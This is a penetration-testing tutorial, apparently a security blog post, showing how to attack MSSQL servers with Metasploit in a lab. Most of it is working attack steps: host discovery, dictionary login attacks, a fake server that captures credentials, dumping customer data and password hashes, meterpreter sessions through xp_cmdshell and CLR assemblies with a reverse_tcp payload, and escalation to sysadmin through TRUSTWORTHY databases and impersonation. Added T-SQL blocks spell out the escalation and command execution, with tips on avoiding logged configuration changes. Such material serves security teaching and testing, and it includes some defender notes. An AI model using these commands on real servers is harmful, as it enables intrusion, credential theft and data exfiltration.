In this article, we will learn in detail how to pentest MSSQL servers using the Metasploit framework.
Table of contents:
  Introduction
  Information Gathering & Enumeration
    Locating MSSQL Server
    Password Cracking
    Retrieving MSSQL version
    MSSQL Enumeration
    SQL Users Enumeration
    Capturing MSSQL login
    Creating Database
    Dumping Database
    SchemaDump
    Hashdump
  Command Execution
    xp_cmdshell
    mssql_exec
    CLR Assembly
  Privilege Escalation
    Public to Sysadmin
    Impersonation
Introduction
Metasploit is an excellent framework originally developed by H. D. Moore and now maintained by Rapid7. It is free, open-source and cross-platform, and ships with a large collection of exploit and auxiliary modules. Its popularity rests primarily on the fact that it is a powerful tool for auditing security, but many of its features also help defenders test their own exposure. Personally speaking, this is my go-to tool for testing, as it bundles nearly every exploit a pentester could need. Through this article, we will learn how to use Metasploit against MSSQL. We will go through the MSSQL modules Metasploit offers step by step, from finding the server on the network to retrieving sensitive information from the database and gaining control of the host. One note on terminology: most of the modules below live under auxiliary/ rather than exploit/; they are started with the same exploit (or run) command, which is why this article calls them exploits throughout. Without any further ado, let us begin.
Information Gathering & Enumeration
Locating MSSQL Server
When testing MSSQL servers, whether remotely or locally, our first requirement is to find the server on the network. For this we use the mssql_ping scanner, which queries the SQL Server Browser service on UDP port 1434 and reports each instance's name, version and TCP port (useful when an instance listens on something other than 1433):
use auxiliary/scanner/mssql/mssql_ping
set rhosts 192.168.1.1/24
exploit
If the Browser service is disabled, this scan returns nothing even though SQL Server is running; in that case, fall back to a TCP port scan for 1433 or the instance's configured port.
Password Cracking
We have found the server, so our next step is to retrieve credentials for it. We will run a dictionary attack with the mssql_login scanner. The user list is supplied with user_file; a password list goes in pass_file (or combined user:password pairs in userpass_file) in the same way:
use auxiliary/scanner/mssql/mssql_login
set rhosts 192.168.1.3
set user_file /root/users.txt
set verbose false
exploit
As you can see in the image above, we have the credentials. Keep in mind that every failed attempt is written to the SQL Server error log as "Login failed for user" (error 18456), so a large wordlist is easy for a defender to spot.
Retrieving MSSQL version
Once we have a valid login, the mssql_sql module lets us run an arbitrary query through its SQL option. Its default query is select @@version, which returns the exact build, edition and host operating system of the server:
use auxiliary/admin/mssql/mssql_sql
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
MSSQL Enumeration
Let's now enumerate the server and see what information we can get. For this we use mssql_enum:
use auxiliary/admin/mssql/mssql_enum
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
The output of this module lists the server configuration (including whether xp_cmdshell and CLR integration are enabled), the databases, the logins and the server roles they hold, and other helpful details. The same can be seen in the image above.
SQL Users Enumeration
We can also obtain a complete list of the logins on the server even when our account lacks permission to read the login catalog. The mssql_enum_sql_logins module guesses principal IDs and resolves each one with SUSER_SNAME(), which works from a low-privileged login:
use auxiliary/admin/mssql/mssql_enum_sql_login
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
As a result, you can see in the image above that the full list of logins is returned.
Capturing MSSQL login
The next module we use is capture/mssql. It starts a fake MSSQL server (on port 1433 by default) and records the credentials of any client that logs in to it, so it is only useful if you can steer a client to your host, for example through DNS or LLMNR poisoning. To use it, type:
use auxiliary/server/capture/mssql
set srvhost 192.168.1.2
exploit
Now, if a user tries to log in to our fake server, for instance with the following command:
sqsh -S 192.168.1.2 -U sa -P "password@1"
then, when you check Metasploit, voila! You will have the correct login credentials of the server, as shown in the image below. This works because the TDS login packet only obfuscates the password (a nibble swap followed by an XOR with 0xA5), which the module simply reverses; it does not work against clients that require an encrypted connection and validate the server certificate.
Creating Database
Usually, any MSSQL server you are pentesting will already hold databases. The server in this lab is freshly installed, though, and we also wanted to show the lab setup; so, for the next modules to have something to find, we create a database ourselves. To make the database, use the following command:
create database bank;
Once the query executes successfully, our next step is to create a table:
CREATE TABLE Customers (
CustomerID int,
LastName varchar(255),
FirstName varchar(255),
passw
varchar(255),
creditcard varchar(255)
);
As you can see in the image above, the table is created. Now let's add data to it with the following queries:
INSERT INTO Customers(CustomerID, LastName, FirstName, passw, creditcard)
VALUES ('01', 'Technologies', 'Ignite', 'admin123', '1111-2222-3333-4444');
INSERT INTO Customers(CustomerID, LastName, FirstName, passw, creditcard)
VALUES ('02', 'Sharma', 'Nisha', 'admin1234', '5555-6666-7777-8888');
INSERT INTO Customers(CustomerID, LastName, FirstName, passw, creditcard)
VALUES ('03', 'Chandel', 'Raj', 'admin12345', '9999-1010-1020-1030');
INSERT INTO Customers(CustomerID, LastName, FirstName, passw, creditcard)
VALUES ('04', 'Madan', 'Geet', 'admin12311', '1234-5678-9012-3456');
This way, you can populate a test database. The CustomerID values are quoted strings, but SQL Server implicitly converts them to int, so the inserts succeed.
Dumping Database
Now that we have our database, let us learn how to dump its content with Metasploit. The mssql_findandsampledata module searches every database the login can access for column names matching the keywords option (separated by |) and returns sample_size rows from each matching table:
use auxiliary/admin/mssql/mssql_findandsampledata
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
set sample_size 4
set keywords FirstName | passw | credit
exploit
Running the module returns the matching content. In our case, the data dumped includes the stored credit card numbers of the customers.
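The queries that this kind of keyword sweep boils down to, as an added example written for this page (it is not taken from the article or from the Metasploit module). It assumes the lab database bank with the Customers table created above and uses the same keyword list; defenders can run the same column search to find where card or password data actually lives.

```sql
-- Added example, not from the original article or Metasploit: the queries a
-- keyword sweep like mssql_findandsampledata boils down to. Assumes the lab
-- database bank with the Customers table created above.

-- 1. Which databases can the current login open at all?
SELECT name
FROM   sys.databases
WHERE  HAS_DBACCESS(name) = 1
  AND  name NOT IN ('master', 'tempdb', 'model', 'msdb');

-- 2. Inside one database, find columns whose names match the keywords
--    (the module's KEYWORDS option: FirstName | passw | credit).
USE bank;
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, DATA_TYPE
FROM   INFORMATION_SCHEMA.COLUMNS
WHERE  COLUMN_NAME LIKE '%FirstName%'
   OR  COLUMN_NAME LIKE '%passw%'
   OR  COLUMN_NAME LIKE '%credit%';

-- 3. Pull a few rows from each hit (the module's SAMPLE_SIZE).
SELECT TOP (4) CustomerID, FirstName, passw, creditcard
FROM   dbo.Customers;

-- 4. The same column search across every accessible database in one pass;
--    sp_MSforeachdb substitutes each database name for "?".
EXEC sp_MSforeachdb N'
IF HAS_DBACCESS(''?'') = 1
    SELECT ''?'' AS db, TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME
    FROM   [?].INFORMATION_SCHEMA.COLUMNS
    WHERE  COLUMN_NAME LIKE ''%passw%''
       OR  COLUMN_NAME LIKE ''%credit%'';';
```

Step 1 is what keeps the sweep quiet: querying databases the login cannot open produces permission errors in the server log for nothing. Step 4 is the loop the module runs for you; sp_MSforeachdb is undocumented but present on every supported version.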
SchemaDump
The next module dumps the schema of the server: every accessible database, its tables, and the columns with their data types. To use it, run the following set of commands:
use auxiliary/scanner/mssql/mssql_schemadump
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
With the above module, we have the schema of each accessible database on the server.
Hashdump
Last but not least, mssql_hashdump dumps the password hashes of the SQL logins. It reads sys.sql_logins, so the login you use must be a sysadmin (hence sa below). To use it, type:
use auxiliary/scanner/mssql/mssql_hashdump
set rhosts 192.168.1.149
set username sa
set password Password@1
exploit
The hashes come back in SQL Server's 0x0100 (SHA-1, SQL Server 2005 onwards) or 0x0200 (SHA-512, 2012 onwards) format and can be cracked offline with hashcat modes 132 and 1731 respectively.
Command Execution
xp_cmdshell
We have found the MSSQL server on the network and retrieved credentials for it. Now, assuming our login holds sysadmin rights (see Privilege Escalation below for how lowpriv gets there), let us get a meterpreter session on the host through xp_cmdshell with the mssql_payload exploit:
use exploit/windows/mssql/mssql_payload
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
As you can see in the above image, the exploit enables xp_cmdshell through sp_configure, uploads the payload through it and runs it. We have written a detailed article on xp_cmdshell, which you can read here. Once xp_cmdshell is enabled, we get our meterpreter session, as shown in the image below. Note that the session runs as the SQL Server service account, and that the sp_configure change is recorded in the SQL Server error log.
mssql_exec
If we only want to run a single command on the server, we can do that with mssql_exec, which enables xp_cmdshell if necessary, runs the command and returns its output:
use auxiliary/admin/mssql/mssql_exec
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
set cmd "net user"
exploit
As you can see in the image above, the command runs successfully and returns the list of local user accounts.
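What mssql_payload and mssql_exec do on the server side, as an added example written for this page (not the article's or the modules' own code): checking and enabling xp_cmdshell, running a command, capturing its output, and putting the setting back. It assumes a login with sysadmin rights.

```sql
-- Added example, not from the original article or Metasploit: the server-side
-- steps behind mssql_exec / mssql_payload. Needs a sysadmin login (lowpriv
-- after escalation, or sa).

-- 1. Current state of the switch (value_in_use = 1 means enabled).
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('show advanced options', 'xp_cmdshell');

-- 2. Enable it. Each sp_configure change is written to the SQL Server error
--    log ("Configuration option 'xp_cmdshell' changed from 0 to 1"), which is
--    the easiest place for a defender to catch this.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 3. Run a command. It executes as the SQL Server service account (or the
--    xp_cmdshell proxy account for non-sysadmin callers); output comes back
--    one row per line.
EXEC master.dbo.xp_cmdshell 'net user';

-- 4. Capture the output in a table so it can be filtered or joined later.
DECLARE @out TABLE (line NVARCHAR(MAX));
INSERT INTO @out EXEC master.dbo.xp_cmdshell 'whoami';
SELECT line FROM @out WHERE line IS NOT NULL;

-- 5. Restore the original configuration (what the modules do on cleanup).
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Step 1 is worth running first: if xp_cmdshell is already on, you avoid the logged configuration change entirely, and if it is off you know the cleanup in step 5 is needed.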
Another method is to first write the statements into a .sql file:
cat user.sql
CREATE LOGIN test1 WITH PASSWORD = 'Password@1';
Now we can run this file against the server with mssql_sql_file:
use auxiliary/admin/mssql/mssql_sql_file
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
set sql_file /root/user.sql
exploit
As a result, the above module creates a login named test1 (which requires the ALTER ANY LOGIN permission, something a sysadmin has). You can connect to the server and confirm the new login, as shown in the image below.
CLR Assembly
The next exploit abuses CLR integration. It enables the clr enabled option with sp_configure, turns on the TRUSTWORTHY property of the database it uses, and creates an UNSAFE assembly that launches the payload; after it has given you the session, it restores both settings and drops the assembly. It requires sysadmin rights. To use it, type:
use exploit/windows/mssql/mssql_clr_payload
set rhosts 192.168.1.3
set payload windows/x64/meterpreter/reverse_tcp
set username lowpriv
set password Password@1
exploit
As you can see, the exploit walks through each of those steps and hands us a meterpreter session, as shown in the image above. A defender can spot this technique by auditing sys.assemblies for unexpected UNSAFE assemblies and alerting on changes to the clr enabled option.
Privilege Escalation
Public to Sysadmin
Now that we have the credentials of a low-privileged login, we can try to escalate it to sysadmin. The mssql_escalate_dbowner module looks for a database that is marked TRUSTWORTHY, is owned by a sysadmin, and in which our login is db_owner; it then creates a stored procedure with EXECUTE AS OWNER that adds our login to the sysadmin role. For this, we use:
use auxiliary/admin/mssql/mssql_escalate_dbowner
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
Note: To understand the working of this module in depth, read our other article here.
As you can see above, our user now has sysadmin privileges. If the module finds no TRUSTWORTHY database owned by a sysadmin in which we are db_owner, this path is closed.
Impersonation
Another route to sysadmin is to impersonate another login. The mssql_escalate_execute_as module checks which logins our user has been granted IMPERSONATE on, picks one that is a sysadmin, and uses EXECUTE AS LOGIN to add our user to the sysadmin role:
use auxiliary/admin/mssql/mssql_escalate_execute_as
set rhosts 192.168.1.3
set username lowpriv
set password Password@1
exploit
As you can see in the image above, lowpriv is allowed to impersonate sa. Since sa is a sysadmin, the module runs as sa for a moment and adds lowpriv to the sysadmin role, so lowpriv is now a sysadmin too.
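The T-SQL behind both escalation paths, together with the checks that close them, as an added example written for this page (it is illustrative code, not the article's or Metasploit's own). It assumes the lab login lowpriv and a database bank owned by sa; the procedure name sp_escalate is hypothetical.

```sql
-- Added example, not from the original article or Metasploit: the T-SQL
-- behind the two escalation modules and the checks that close the holes.
-- Assumes the lab login lowpriv and a database bank owned by sa; the
-- procedure name sp_escalate is hypothetical.

-- ===== Path 1: db_owner on a TRUSTWORTHY database (mssql_escalate_dbowner) =====

-- Precondition: a TRUSTWORTHY database whose owner is a sysadmin ...
SELECT d.name, SUSER_SNAME(d.owner_sid) AS owner_login
FROM   sys.databases d
WHERE  d.is_trustworthy_on = 1
  AND  IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) = 1;

-- ... in which the current login is db_owner.
USE bank;
SELECT IS_MEMBER('db_owner') AS i_am_db_owner;
GO

-- A procedure marked EXECUTE AS OWNER runs as the database owner (sa here).
-- Because the database is TRUSTWORTHY, the server honours that context outside
-- the database, so the procedure may change server-level role membership.
CREATE PROCEDURE dbo.sp_escalate
WITH EXECUTE AS OWNER
AS
    ALTER SERVER ROLE sysadmin ADD MEMBER lowpriv;
GO
EXEC dbo.sp_escalate;
DROP PROCEDURE dbo.sp_escalate;
SELECT IS_SRVROLEMEMBER('sysadmin') AS i_am_sysadmin;

-- ===== Path 2: IMPERSONATE on a sysadmin login (mssql_escalate_execute_as) =====

-- Precondition: direct IMPERSONATE grants held by the current login
-- (grants inherited through server roles are not listed by this query).
SELECT pr.name AS target_login,
       IS_SRVROLEMEMBER('sysadmin', pr.name) AS target_is_sysadmin
FROM   sys.server_permissions pe
JOIN   sys.server_principals pr ON pr.principal_id = pe.major_id
WHERE  pe.class_desc = 'SERVER_PRINCIPAL'
  AND  pe.permission_name = 'IMPERSONATE'
  AND  pe.grantee_principal_id = SUSER_ID();

-- Switch to sa for one statement, then drop back.
EXECUTE AS LOGIN = 'sa';
ALTER SERVER ROLE sysadmin ADD MEMBER lowpriv;
REVERT;

-- ===== Closing both paths (defender side) =====
ALTER DATABASE bank SET TRUSTWORTHY OFF;         -- or give it a non-sysadmin owner
REVOKE IMPERSONATE ON LOGIN::sa FROM lowpriv;
ALTER SERVER ROLE sysadmin DROP MEMBER lowpriv;  -- undo the escalation itself
```

The two precondition queries are the ones to run during a defensive review: any row from the first (a TRUSTWORTHY database owned by a sysadmin) or the second (an IMPERSONATE grant on a sysadmin login) is a standing sysadmin-equivalent for whoever holds db_owner or the grant.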
All in all, Metasploit is one of the best tools for pentesting MSSQL servers, as it offers modules covering each stage of the engagement, from discovery to escalation.